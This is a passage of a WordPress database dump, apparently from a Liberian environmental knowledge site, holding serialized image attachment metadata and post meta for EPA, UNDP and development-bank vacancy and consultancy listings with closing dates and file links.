image/jpeg\";s:8:\"filesize\";i:108105;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38162,5686,'_wp_attached_file','2025/12/WhatsApp-Image-2025-12-11-at-18.01.25.jpeg'),(38163,5686,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:50:\"2025/12/WhatsApp-Image-2025-12-11-at-18.01.25.jpeg\";s:8:\"filesize\";i:184418;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.25-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16055;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-12-11-at-18.01.25-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101391;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.25-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6706;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.25-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65604;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-12-11-at-18.01.25-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:182885;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.25-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21002;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:49:\"WhatsApp-Image-2025-12-11-at-18.01.25-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4375;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.25-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12627;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.25-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28478;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.25-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30223;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.25-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44007;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-12-11-at-18.01.25-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88864;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-12-11-at-18.01.25-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:184389;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.25-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45868;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2025-12-11-at-18.01.25-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57502;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-12-11-at-18.01.25-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90148;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38166,5683,'_thumbnail_id','5686'),(38167,5683,'_edit_last','38'),(38168,5683,'kava_extra_enable_breadcrumbs','inherit'),(38169,5683,'post_formats',''),(38170,5683,'gallery_tab',''),(38171,5683,'kava_extra_gallery_images',''),(38172,5683,'link_tab',''),(38173,5683,'kava_extra_link',''),(38174,5683,'kava_extra_link_target','_blank'),(38175,5683,'quote_tab',''),(38176,5683,'kava_extra_quote_text',''),(38177,5683,'kava_extra_quote_cite',''),(38178,5683,'audio_tab',''),(38179,5683,'kava_extra_audio',''),(38180,5683,'kava_extra_audio_loop','false'),(38181,5683,'kava_extra_audio_autoplay','false'),(38182,5683,'kava_extra_audio_preload','false'),(38183,5683,'video_tab',''),(38184,5683,'kava_extra_video_type','library'),(38185,5683,'kava_extra_video_library',''),(38186,5683,'kava_extra_video_external',''),(38187,5683,'kava_extra_video_poster',''),(38188,5683,'kava_extra_video_width','770'),(38189,5683,'kava_extra_video_height','480'),(38190,5683,'kava_extra_video_loop','false'),(38191,5683,'kava_extra_video_autoplay','false'),(38192,5683,'kava_extra_video_preload','false'),(38193,5688,'_wp_attached_file','2025/12/Contractual-Service-Inclusive-Finance-Specialist-1.docx'),(38194,5688,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:84269;}'),(38195,5682,'_wp_page_template','default'),(38196,5682,'closed_date','2025-12-17'),(38197,5682,'owner','EPA/UNDP'),(38198,5682,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2025/12/Contractual-Service-Inclusive-Finance-Specialist-1.docx'),(38199,5692,'_last_editor_used_jetpack','classic-editor'),(38200,5692,'_edit_lock','1767702053:38'),(38201,5692,'_edit_last','38'),(38202,5692,'_wp_page_template','default'),(38203,5692,'closed_date','2026-01-15'),(38204,5692,'owner','EPA'),(38205,5692,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2026/01/Draft-Terms-of-Reference-ABS-1ST-National-Report.pdf'),(38206,5694,'_wp_attached_file','2026/01/Draft-Terms-of-Reference-ABS-1ST-National-Report.pdf'),(38207,5694,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:116035;}'),(38208,5696,'_edit_lock','1767824966:38'),(38209,5696,'_last_editor_used_jetpack','block-editor'),(38210,5697,'_wp_attached_file','2026/01/today2.jpeg'),(38211,5697,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:584;s:4:\"file\";s:19:\"2026/01/today2.jpeg\";s:8:\"filesize\";i:139563;s:5:\"sizes\";a:13:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"today2-300x137.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:137;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14911;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"today2-1024x467.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:467;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108732;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"today2-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8493;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"today2-768x350.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69844;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"today2-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30360;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:18:\"today2-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5789;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:19:\"today2-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16606;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:19:\"today2-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40632;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:19:\"today2-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41824;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:19:\"today2-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64060;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:20:\"today2-1170x584.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:584;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154119;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:19:\"today2-600x274.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46923;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:19:\"today2-640x584.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:584;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82268;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38212,5698,'_wp_attached_file','2026/01/Today-Pic.jpeg'),(38213,5698,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:566;s:4:\"file\";s:22:\"2026/01/Today-Pic.jpeg\";s:8:\"filesize\";i:117289;s:5:\"sizes\";a:13:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"Today-Pic-300x133.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13526;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"Today-Pic-1024x453.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92341;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Today-Pic-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7878;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"Today-Pic-768x340.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60000;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"Today-Pic-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26303;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:21:\"Today-Pic-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5584;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:22:\"Today-Pic-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15141;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:22:\"Today-Pic-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35183;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:22:\"Today-Pic-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37767;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:22:\"Today-Pic-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54635;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:23:\"Today-Pic-1170x566.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:566;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126677;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:22:\"Today-Pic-600x265.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40679;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:22:\"Today-Pic-640x566.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:566;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68435;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38216,5696,'_thumbnail_id','5698'),(38217,5696,'_edit_last','38'),(38218,5696,'kava_extra_enable_breadcrumbs','inherit'),(38219,5696,'post_formats',''),(38220,5696,'gallery_tab',''),(38221,5696,'kava_extra_gallery_images',''),(38222,5696,'link_tab',''),(38223,5696,'kava_extra_link',''),(38224,5696,'kava_extra_link_target','_blank'),(38225,5696,'quote_tab',''),(38226,5696,'kava_extra_quote_text',''),(38227,5696,'kava_extra_quote_cite',''),(38228,5696,'audio_tab',''),(38229,5696,'kava_extra_audio',''),(38230,5696,'kava_extra_audio_loop','false'),(38231,5696,'kava_extra_audio_autoplay','false'),(38232,5696,'kava_extra_audio_preload','false'),(38233,5696,'video_tab',''),(38234,5696,'kava_extra_video_type','library'),(38235,5696,'kava_extra_video_library',''),(38236,5696,'kava_extra_video_external',''),(38237,5696,'kava_extra_video_poster',''),(38238,5696,'kava_extra_video_width','770'),(38239,5696,'kava_extra_video_height','480'),(38240,5696,'kava_extra_video_loop','false'),(38241,5696,'kava_extra_video_autoplay','false'),(38242,5696,'kava_extra_video_preload','false'),(38243,5700,'_edit_lock','1768849476:38'),(38244,5700,'_last_editor_used_jetpack','block-editor'),(38245,5701,'_wp_attached_file','2026/01/todat.jpeg'),(38246,5701,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1706;s:4:\"file\";s:18:\"2026/01/todat.jpeg\";s:8:\"filesize\";i:1147901;s:5:\"sizes\";a:17:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"todat-300x200.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17087;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"todat-1024x682.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116958;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"todat-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7011;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"todat-768x512.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73474;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"todat-1536x1024.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:230949;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:20:\"todat-2048x1365.jpeg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:384432;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"todat-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24601;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:17:\"todat-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5870;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:18:\"todat-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13155;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:18:\"todat-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29964;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:18:\"todat-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31105;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:18:\"todat-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48243;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:19:\"todat-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135418;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:20:\"todat-1920x1080.jpeg\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:316495;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:18:\"todat-600x400.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49854;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:18:\"todat-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63006;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:19:\"todat-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152308;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38249,5700,'_thumbnail_id','5701'),(38250,5700,'_edit_last','38'),(38251,5700,'kava_extra_enable_breadcrumbs','inherit'),(38252,5700,'post_formats',''),(38253,5700,'gallery_tab',''),(38254,5700,'kava_extra_gallery_images',''),(38255,5700,'link_tab',''),(38256,5700,'kava_extra_link',''),(38257,5700,'kava_extra_link_target','_blank'),(38258,5700,'quote_tab',''),(38259,5700,'kava_extra_quote_text',''),(38260,5700,'kava_extra_quote_cite',''),(38261,5700,'audio_tab',''),(38262,5700,'kava_extra_audio',''),(38263,5700,'kava_extra_audio_loop','false'),(38264,5700,'kava_extra_audio_autoplay','false'),(38265,5700,'kava_extra_audio_preload','false'),(38266,5700,'video_tab',''),(38267,5700,'kava_extra_video_type','library'),(38268,5700,'kava_extra_video_library',''),(38269,5700,'kava_extra_video_external',''),(38270,5700,'kava_extra_video_poster',''),(38271,5700,'kava_extra_video_width','770'),(38272,5700,'kava_extra_video_height','480'),(38273,5700,'kava_extra_video_loop','false'),(38274,5700,'kava_extra_video_autoplay','false'),(38275,5700,'kava_extra_video_preload','false'),(38276,5703,'_last_editor_used_jetpack','classic-editor'),(38277,5703,'_edit_lock','1768905213:38'),(38278,5703,'_edit_last','38'),(38279,5703,'_wp_page_template','default'),(38280,5703,'closed_date','2026-02-03'),(38281,5703,'owner','EPA'),(38282,5703,'vacancy_link',''),(38283,5705,'_wp_attached_file','2026/01/Final-ToR-Legal-Assistant.docx'),(38284,5705,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:86812;}'),(38287,5708,'_last_editor_used_jetpack','classic-editor'),(38288,5708,'_edit_lock','1768910908:38'),(38289,5708,'_edit_last','38'),(38290,5708,'_wp_page_template','default'),(38291,5708,'closed_date','2026-02-03'),(38292,5708,'owner','EPA'),(38293,5708,'vacancy_link',''),(38294,5710,'_wp_attached_file','2026/01/Final-ToR-Legal-Officer-2025-1.docx'),(38295,5710,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:86683;}'),(38296,5712,'_last_editor_used_jetpack','classic-editor'),(38297,5712,'_edit_lock','1769453146:38'),(38298,5712,'_edit_last','38'),(38299,5712,'_wp_page_template','default'),(38300,5712,'closed_date','2026-03-31'),(38301,5712,'owner','EPA'),(38302,5712,'vacancy_link',''),(38303,5714,'_wp_attached_file','2026/01/2026-Call-for-Applications-DemGlobalEdu-University-of-Cambridge-EPA.pdf'),(38304,5714,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:224638;}'),(38305,5717,'_last_editor_used_jetpack','classic-editor'),(38306,5717,'_edit_lock','1769455568:38'),(38307,5717,'_edit_last','38'),(38308,5717,'_wp_page_template','default'),(38309,5717,'closed_date','2026-02-05'),(38310,5717,'owner','EPA/WADB'),(38311,5717,'vacancy_link',''),(38312,5719,'_wp_attached_file','2026/01/9a_reoi_international_consultant_to_develop_a_quality_management_system_qms_and_workplan_002.pdf'),(38313,5719,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:266834;}'),(38314,5721,'_last_editor_used_jetpack','classic-editor'),(38315,5721,'_edit_lock','1769456429:38'),(38316,5721,'_edit_last','38'),(38317,5721,'_wp_page_template','default'),(38318,5721,'closed_date','2026-02-05'),(38319,5721,'owner','EPA/WADB'),(38320,5721,'vacancy_link',''),(38321,5723,'_wp_attached_file','2026/01/8a_reoi_professional_services_for_nmc_renovation_at_roberts_international_airport.pdf'),(38322,5723,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:264526;}'),(38323,5725,'_last_editor_used_jetpack','classic-editor'),(38324,5725,'_edit_lock','1771843567:38'),(38325,5725,'_edit_last','38'),(38326,5725,'_wp_page_template','default'),(38327,5725,'closed_date','2026-02-26'),(38328,5725,'owner','EPA/AFDB'),(38329,5725,'vacancy_link',''),(38331,5728,'_wp_attached_file','2026/01/7a_reoi_local_consultant_to_develop_and_operationalize_an_automated_decision_management_system_adms-1.pdf'),(38332,5728,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:256710;}'),(38333,5730,'_last_editor_used_jetpack','classic-editor'),(38334,5730,'_edit_lock','1769459641:38'),(38335,5730,'_edit_last','38'),(38336,5730,'_wp_page_template','default'),(38337,5730,'closed_date','2026-02-05'),(38338,5730,'owner','EPA/WADB'),(38339,5730,'vacancy_link',''),(38340,5732,'_wp_attached_file','2026/01/6a_reoi_local_consultant_to_develop_policy_to_transform_lmhs.pdf'),(38341,5732,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:268877;}'),(38343,5735,'_edit_lock','1769460202:38'),(38344,5735,'_last_editor_used_jetpack','block-editor'),(38345,5736,'_wp_attached_file','2026/01/WhatsApp-Image-2026-01-26-at-18.25.56-scaled.jpeg'),(38346,5736,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2048;s:6:\"height\";i:2560;s:4:\"file\";s:57:\"2026/01/WhatsApp-Image-2026-01-26-at-18.25.56-scaled.jpeg\";s:8:\"filesize\";i:568376;s:5:\"sizes\";a:17:{s:6:\"medium\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-18.25.56-240x300.jpeg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17021;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2026-01-26-at-18.25.56-819x1024.jpeg\";s:5:\"width\";i:819;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116777;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-18.25.56-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7423;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-18.25.56-768x960.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103905;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2026-01-26-at-18.25.56-1229x1536.jpeg\";s:5:\"width\";i:1229;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:236499;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2026-01-26-at-18.25.56-1638x2048.jpeg\";s:5:\"width\";i:1638;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:388379;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-18.25.56-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20122;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:49:\"WhatsApp-Image-2026-01-26-at-18.25.56-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4987;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-18.25.56-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13163;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-18.25.56-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28996;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:50:\"WhatsApp-Image-2026-01-26-at-18.25.56-370x500.jpeg\";s:5:\"width\";i: